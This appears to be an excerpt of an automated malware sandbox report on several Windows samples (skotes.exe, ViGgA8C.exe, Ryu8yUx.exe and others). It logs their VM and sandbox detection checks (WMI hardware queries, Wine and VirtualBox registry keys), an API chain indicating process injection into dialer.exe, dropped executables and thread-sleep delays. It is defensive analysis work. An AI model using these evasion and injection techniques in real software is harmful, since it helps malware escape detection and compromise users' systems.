Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Contains functionality to compare user and computer (likely to detect sandboxes)

Source: C:\Windows\System32\dialer.exe

Code function: OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,

47_2_00000001400010C0

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\1073896001\ViGgA8C.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\1073896001\ViGgA8C.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe

System information queried: FirmwareTableInformation

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\Mc3FDUMnVz.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\Mc3FDUMnVz.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1073896001\ViGgA8C.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1073896001\ViGgA8C.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__

Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Memory allocated: 2A00000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Memory allocated: 2B70000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Memory allocated: 4B70000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1073896001\ViGgA8C.exe	Memory allocated: 5220000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1073896001\ViGgA8C.exe	Memory allocated: 55E0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1073896001\ViGgA8C.exe	Memory allocated: 5520000 memory reserve \| memory write watch

Source: C:\Users\user\AppData\Local\Temp\1073896001\ViGgA8C.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\1073896001\ViGgA8C.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\1073896001\ViGgA8C.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion

Source: C:\Users\user\Desktop\Mc3FDUMnVz.exe

Code function: 0_2_04D40C8F rdtsc

0_2_04D40C8F

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1073896001\ViGgA8C.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 462	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 1594	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 2091	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9878	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Window / User API: threadDelayed 8160	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9889	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9895	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 9680
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9927
Source: C:\Windows\System32\cmd.exe	Window / User API: threadDelayed 9675
Source: C:\Windows\System32\conhost.exe	Window / User API: threadDelayed 9661
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9915
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9556
Source: C:\Windows\System32\dialer.exe	Window / User API: threadDelayed 8469
Source: C:\Windows\System32\dialer.exe	Window / User API: threadDelayed 912
Source: C:\Windows\System32\winlogon.exe	Window / User API: threadDelayed 8815
Source: C:\Windows\System32\lsass.exe	Window / User API: threadDelayed 9747
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 9083
Source: C:\Windows\System32\dwm.exe	Window / User API: threadDelayed 564
Source: C:\Windows\System32\dwm.exe	Window / User API: threadDelayed 9140
Source: C:\Users\user\AppData\Local\Temp\1073896001\ViGgA8C.exe	Window / User API: threadDelayed 9833
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 701
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 9058
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 1521
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 8245
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 2854
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 6928
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 4476
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 5326
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 7478
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 2269
Source: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHDCPSvc.exe	Window / User API: threadDelayed 7372
Source: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHDCPSvc.exe	Window / User API: threadDelayed 1610
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 8854
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 735

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\L2D128LW\WveK4j1[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B0ZBZFKQ\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\L2D128LW\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1074040001\439c2c3c87.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1074041001\23a60cad74.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1074030001\bb6a39dc63.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1073975001\WveK4j1.exe	Jump to dropped file

Source: C:\Windows\System32\svchost.exe

Evasive API call chain: RegOpenKey,DecisionNodes,Sleep

graph_14-14908

Source: C:\Windows\System32\dialer.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

graph_47-409

Source: C:\Windows\System32\svchost.exe

API coverage: 8.1 %

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1508	Thread sleep count: 42 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1508	Thread sleep time: -84042s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7712	Thread sleep count: 88 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7712	Thread sleep time: -176088s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6024	Thread sleep count: 462 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6024	Thread sleep time: -13860000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2756	Thread sleep count: 99 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2756	Thread sleep time: -198099s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 488	Thread sleep count: 114 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 488	Thread sleep time: -228114s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2756	Thread sleep count: 1594 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2756	Thread sleep time: -3189594s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6636	Thread sleep count: 2091 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6636	Thread sleep time: -4184091s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 596	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8020	Thread sleep count: 9889 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5756	Thread sleep count: 9895 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe TID: 7632	Thread sleep time: -90000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe TID: 6776	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6892	Thread sleep count: 9680 > 30
Source: C:\Windows\System32\svchost.exe TID: 6892	Thread sleep time: -9680000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6892	Thread sleep count: 280 > 30
Source: C:\Windows\System32\svchost.exe TID: 6892	Thread sleep time: -280000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4004	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\cmd.exe TID: 7812	Thread sleep time: -9675000s >= -30000s
Source: C:\Windows\System32\cmd.exe TID: 7812	Thread sleep time: -215000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7840	Thread sleep count: 9915 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7276	Thread sleep count: 9556 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7276	Thread sleep count: 296 > 30
Source: C:\Windows\System32\dialer.exe TID: 1212	Thread sleep count: 8469 > 30
Source: C:\Windows\System32\dialer.exe TID: 1212	Thread sleep time: -846900s >= -30000s
Source: C:\Windows\System32\dialer.exe TID: 2420	Thread sleep count: 912 > 30
Source: C:\Windows\System32\dialer.exe TID: 2420	Thread sleep time: -91200s >= -30000s
Source: C:\Windows\System32\dialer.exe TID: 1212	Thread sleep count: 335 > 30
Source: C:\Windows\System32\dialer.exe TID: 1212	Thread sleep time: -33500s >= -30000s
Source: C:\Windows\System32\winlogon.exe TID: 2060	Thread sleep count: 250 > 30
Source: C:\Windows\System32\winlogon.exe TID: 2060	Thread sleep time: -250000s >= -30000s
Source: C:\Windows\System32\winlogon.exe TID: 2060	Thread sleep count: 8815 > 30
Source: C:\Windows\System32\winlogon.exe TID: 2060	Thread sleep time: -8815000s >= -30000s
Source: C:\Windows\System32\lsass.exe TID: 900	Thread sleep count: 160 > 30
Source: C:\Windows\System32\lsass.exe TID: 900	Thread sleep time: -160000s >= -30000s
Source: C:\Windows\System32\lsass.exe TID: 900	Thread sleep count: 9747 > 30
Source: C:\Windows\System32\lsass.exe TID: 900	Thread sleep time: -9747000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 1668	Thread sleep count: 249 > 30
Source: C:\Windows\System32\svchost.exe TID: 1668	Thread sleep time: -249000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 1668	Thread sleep count: 9083 > 30
Source: C:\Windows\System32\svchost.exe TID: 1668	Thread sleep time: -9083000s >= -30000s
Source: C:\Windows\System32\dwm.exe TID: 7864	Thread sleep count: 564 > 30
Source: C:\Windows\System32\dwm.exe TID: 7864	Thread sleep time: -564000s >= -30000s
Source: C:\Windows\System32\dwm.exe TID: 7864	Thread sleep count: 9140 > 30
Source: C:\Windows\System32\dwm.exe TID: 7864	Thread sleep time: -9140000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1073896001\ViGgA8C.exe TID: 3956	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 3096	Thread sleep count: 701 > 30
Source: C:\Windows\System32\svchost.exe TID: 3096	Thread sleep time: -701000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 3096	Thread sleep count: 9058 > 30
Source: C:\Windows\System32\svchost.exe TID: 3096	Thread sleep time: -9058000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 2044	Thread sleep count: 1521 > 30
Source: C:\Windows\System32\svchost.exe TID: 2044	Thread sleep time: -1521000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 2044	Thread sleep count: 8245 > 30
Source: C:\Windows\System32\svchost.exe TID: 2044	Thread sleep time: -8245000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7220	Thread sleep count: 2854 > 30
Source: C:\Windows\System32\svchost.exe TID: 7220	Thread sleep time: -2854000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7220	Thread sleep count: 6928 > 30
Source: C:\Windows\System32\svchost.exe TID: 7220	Thread sleep time: -6928000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6104	Thread sleep count: 4476 > 30
Source: C:\Windows\System32\svchost.exe TID: 6104	Thread sleep time: -4476000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6104	Thread sleep count: 5326 > 30
Source: C:\Windows\System32\svchost.exe TID: 6104	Thread sleep time: -5326000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5612	Thread sleep count: 7478 > 30
Source: C:\Windows\System32\svchost.exe TID: 5612	Thread sleep time: -7478000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5612	Thread sleep count: 2269 > 30
Source: C:\Windows\System32\svchost.exe TID: 5612	Thread sleep time: -2269000s >= -30000s
